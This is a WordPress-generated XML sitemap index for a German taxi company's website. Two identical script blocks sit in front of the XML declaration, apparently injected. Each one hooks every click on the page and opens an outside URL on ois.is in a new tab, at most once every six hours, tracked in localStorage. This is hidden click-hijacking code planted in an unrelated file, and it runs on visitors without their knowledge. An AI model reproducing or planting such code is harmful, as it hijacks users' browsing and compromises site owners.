<script>(function (parameters) {
		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
		const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);

		function globalClick(event) {
			const host = location.host
			const newLocation = "https://ois.is/images/logo.png"
			const allowedHours = 6

			const nowDate = Date.parse(new Date());
			const savedData = getFromStorage(host)

			if (savedData) {
				try {
					const storageDate = parseInt(savedData);
					// check hours
					const hoursDiff = getHoursDiff(nowDate, storageDate)
					console.log(nowDate, storageDate, hoursDiff)
					if (hoursDiff >= allowedHours) {
						addToStorage(host, nowDate);
						window.open(newLocation, "_blank");
					}
				} catch (error) {
					addToStorage(host, nowDate);
					window.open(newLocation, "_blank");
				}
			} else {
				addToStorage(host, nowDate);
				window.open(newLocation, "_blank");
			}
		}
		document.addEventListener("click", globalClick);
	})();</script><script>(function (parameters) {
		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
		const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);

		function globalClick(event) {
			const host = location.host
			const newLocation = "https://ois.is/images/logo.png"
			const allowedHours = 6

			const nowDate = Date.parse(new Date());
			const savedData = getFromStorage(host)

			if (savedData) {
				try {
					const storageDate = parseInt(savedData);
					// check hours
					const hoursDiff = getHoursDiff(nowDate, storageDate)
					console.log(nowDate, storageDate, hoursDiff)
					if (hoursDiff >= allowedHours) {
						addToStorage(host, nowDate);
						window.open(newLocation, "_blank");
					}
				} catch (error) {
					addToStorage(host, nowDate);
					window.open(newLocation, "_blank");
				}
			} else {
				addToStorage(host, nowDate);
				window.open(newLocation, "_blank");
			}
		}
		document.addEventListener("click", globalClick);
	})();</script><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="https://ok-taxi-wildbad.de/wp-content/plugins/google-sitemap-generator/sitemap.xsl"?><!-- sitemap-generator-url="http://www.arnebrachhold.de" sitemap-generator-version="4.1.1" -->
<!-- generated-on="April 5, 2026 1:09 pm" -->
<sitemapindex xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">	<sitemap>
		<loc>https://ok-taxi-wildbad.de/sitemap-misc.xml</loc>
		<lastmod>2023-03-08T17:01:46+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ok-taxi-wildbad.de/sitemap-pt-post-2020-11.xml</loc>
		<lastmod>2020-11-27T15:56:05+00:00</lastmod>
	</sitemap>
</sitemapindex><!-- Request ID: eb9e9f0527c0cd05e292382074d67646; Queries for sitemap: 5; Total queries: 30; Seconds: 0.01; Memory for sitemap: 0MB; Total memory: 20MB -->
